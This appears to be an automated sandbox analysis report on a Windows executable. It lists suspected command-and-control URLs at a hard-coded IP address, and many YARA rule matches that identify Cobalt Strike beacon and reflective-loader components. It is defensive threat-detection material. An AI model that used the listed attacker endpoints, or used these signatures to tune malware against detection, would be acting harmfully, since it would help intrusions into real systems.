          Source: A1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2611121723.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsom
          Source: A1E0xfcSNl.exe, 00000000.00000003.2755973455.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2768714547.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jsoms
          Source: A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/en_US/all.jspData
          Source: A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/l
          Source: A1E0xfcSNl.exe, 00000000.00000003.2587345424.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/lla
          Source: A1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/m/J
          Source: A1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/m/Z
          Source: A1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://89.197.154.116:7810/y

          System Summary

          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload | Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts | Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload | Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts | Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload | Author: ditekSHen
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader | Author: unknown
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader | Author: unknown
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike payload | Author: ditekSHen
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader | Author: unknown
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Meterpreter Beacon - file K5om.dll | Author: Florian Roth
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike sample from Leviathan report | Author: Florian Roth
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Cobalt Strike loader | Author: @VK_Intel
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Reflective DLL injection artifacts | Author: ditekSHen
          Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike payload | Author: ditekSHen
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
          Source: Process Memory Space: A1E0xfcSNl.exe PID: 7420, type: MEMORYSTR | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007E2078 CreateProcessWithLogonW, | 0_2_007E2078
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0076916C | 0_2_0076916C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00781928 | 0_2_00781928
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00785914 | 0_2_00785914
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B2980 | 0_2_007B2980
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00781264 | 0_2_00781264
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078AAB0 | 0_2_0078AAB0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B2B78 | 0_2_007B2B78
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00780374 | 0_2_00780374
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00770334 | 0_2_00770334
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B2BD8 | 0_2_007B2BD8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B2BC8 | 0_2_007B2BC8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078239C | 0_2_0078239C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078C397 | 0_2_0078C397
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B2C40 | 0_2_007B2C40
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B2C08 | 0_2_007B2C08
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0077F5A8 | 0_2_0077F5A8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0076CE3C | 0_2_0076CE3C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078E600 | 0_2_0078E600
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00769680 | 0_2_00769680
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078C680 | 0_2_0078C680
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_00776F38 | 0_2_00776F38
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078CFF0 | 0_2_0078CFF0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_0078B7B0 | 0_2_0078B7B0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007D01A8 | 0_2_007D01A8
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007BDA3C | 0_2_007BDA3C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007DF200 | 0_2_007DF200
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007BA280 | 0_2_007BA280
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007DD280 | 0_2_007DD280
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C7B38 | 0_2_007C7B38
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007DDBF0 | 0_2_007DDBF0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007DC3B0 | 0_2_007DC3B0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007B9D6C | 0_2_007B9D6C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007D2528 | 0_2_007D2528
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007D6514 | 0_2_007D6514
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C867C | 0_2_007C867C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007D1E64 | 0_2_007D1E64
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007DB6B0 | 0_2_007DB6B0
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007D0F74 | 0_2_007D0F74
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007C0F34 | 0_2_007C0F34
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007D2F9C | 0_2_007D2F9C
          Source: C:\Users\user\Desktop\A1E0xfcSNl.exe | Code function: 0_2_007DCF97 | 0_2_007DCF97
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc | reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Beacon_K5om | date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Leviathan_CobaltStrike_Sample_1 | date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_csbeacon_1 | date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CobaltStrike | author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.A1E0xfcSNl.exe.7b0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 0.2.A1E0xfcSNl.exe.760000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
          Source: 0.2.A1E0xfcSNl.exe.760000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
